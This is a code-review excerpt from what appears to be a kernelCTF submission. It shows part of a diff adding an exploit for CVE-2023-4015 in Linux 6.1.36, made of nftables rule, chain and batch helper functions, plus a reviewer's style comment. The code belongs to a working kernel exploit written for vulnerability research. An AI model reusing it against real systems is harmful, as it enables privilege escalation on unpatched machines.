pocs/linux/kernelctf/CVE-2023-4015_lts_2/exploit/lts-6.1.36/exploit.c

```diff
@@ -0,0 +1,654 @@
+        nftnl_rule_add_expr(r, exprs[i]);
+
+    if (udlen > 0)
+        nftnl_rule_set_data(r, NFTNL_RULE_USERDATA, udata, udlen);
+
+    if (handle > 0)
+        nftnl_rule_set_u64(r, NFTNL_RULE_HANDLE, handle);
+
+    return r;
+}
+
+static expr make_immediate_jump_expr(const char *target_chain) {
+    expr e = nftnl_expr_alloc("immediate");
+    if (e == NULL)
+        return NULL;
+
+    nftnl_expr_set_u32(e, NFTNL_EXPR_IMM_DREG, NFT_REG_VERDICT);
+    nftnl_expr_set_u32(e, NFTNL_EXPR_IMM_VERDICT, NFT_JUMP);
+    nftnl_expr_set_str(e, NFTNL_EXPR_IMM_CHAIN, target_chain);
+
+    return e;
+}
+
+static expr make_notrack_expr() {
+    return nftnl_expr_alloc("notrack");
+}
+
+static batch batch_init(size_t size) {
+    void *buf = malloc(size);
+    batch b = mnl_nlmsg_batch_start(buf, size);
+    nftnl_batch_begin(mnl_nlmsg_batch_current(b), seq++);
+    mnl_nlmsg_batch_next(b);
+    rseq = seq;
+    return b;
+}
+
+static void batch_end(batch b) {
+    nftnl_batch_end(mnl_nlmsg_batch_current(b), seq);
+    mnl_nlmsg_batch_next(b);
+}
+
+static ssize_t batch_send(batch b, sock s) {
+    return mnl_socket_sendto(s, mnl_nlmsg_batch_head(b), mnl_nlmsg_batch_size(b));
+}
+
+static void batch_free(batch b) {
+    free(mnl_nlmsg_batch_head(b));
+    mnl_nlmsg_batch_stop(b);
+}
+
+static void batch_new_table(batch b, table t) {
+    nlmsghdr hdr = nftnl_nlmsg_build_hdr((char *)mnl_nlmsg_batch_current(b), NFT_MSG_NEWTABLE, family, NLM_F_ACK | NLM_F_CREATE | NLM_F_APPEND, seq++);
+    nftnl_table_nlmsg_build_payload(hdr, t);
+    mnl_nlmsg_batch_next(b);
+}
+
+static void batch_new_chain(batch b, chain c) {
+    nlmsghdr hdr = nftnl_nlmsg_build_hdr((char *)mnl_nlmsg_batch_current(b), NFT_MSG_NEWCHAIN, family, NLM_F_ACK | NLM_F_CREATE | NLM_F_APPEND, seq++);
+    nftnl_chain_nlmsg_build_payload(hdr, c);
+    mnl_nlmsg_batch_next(b);
+}
+
+static void batch_del_chain(batch b, chain c) {
+    nlmsghdr hdr = nftnl_nlmsg_build_hdr((char *)mnl_nlmsg_batch_current(b), NFT_MSG_DELCHAIN, family, NLM_F_ACK, seq++);
+    nftnl_chain_nlmsg_build_payload(hdr, c);
+    mnl_nlmsg_batch_next(b);
+}
+
+static void batch_new_rule(batch b, rule r) {
+    nlmsghdr hdr = nftnl_nlmsg_build_hdr((char *)mnl_nlmsg_batch_current(b), NFT_MSG_NEWRULE, family, NLM_F_ACK | NLM_F_CREATE | NLM_F_APPEND, seq++);
+    nftnl_rule_nlmsg_build_payload(hdr, r);
+    mnl_nlmsg_batch_next(b);
+}
+
+static void batch_del_rule(batch b, rule r) {
+    nlmsghdr hdr = nftnl_nlmsg_build_hdr((char *)mnl_nlmsg_batch_current(b), NFT_MSG_DELRULE, family, NLM_F_ACK, seq++);
+    nftnl_rule_nlmsg_build_payload(hdr, r);
+    mnl_nlmsg_batch_next(b);
+}
+
+static nlmsghdr dump_rule(rule r, char *buf) {
+    nlmsghdr hdr = nftnl_nlmsg_build_hdr(buf, NFT_MSG_GETRULE, family, NLM_F_ACK, seq++);
+    nftnl_rule_nlmsg_build_payload(hdr, r);
+    return hdr;
+}
+
+static int run_callbacks(sock s, mnl_cb_t cb, void *data) {
+    // INFO("Start callback: rseq = %d, seq = %d", rseq, seq);
```

Comment:
Not a serious concern, but why was this commented out? It is called too many times? Maybe convert to DEBUG( and give an option via defines or command line arguments to turn on/off debug messages? (Or you can just remove it).

More info in our [style guide](https://google.github.io/security-research/kernelctf/style_guide#commented-out-code).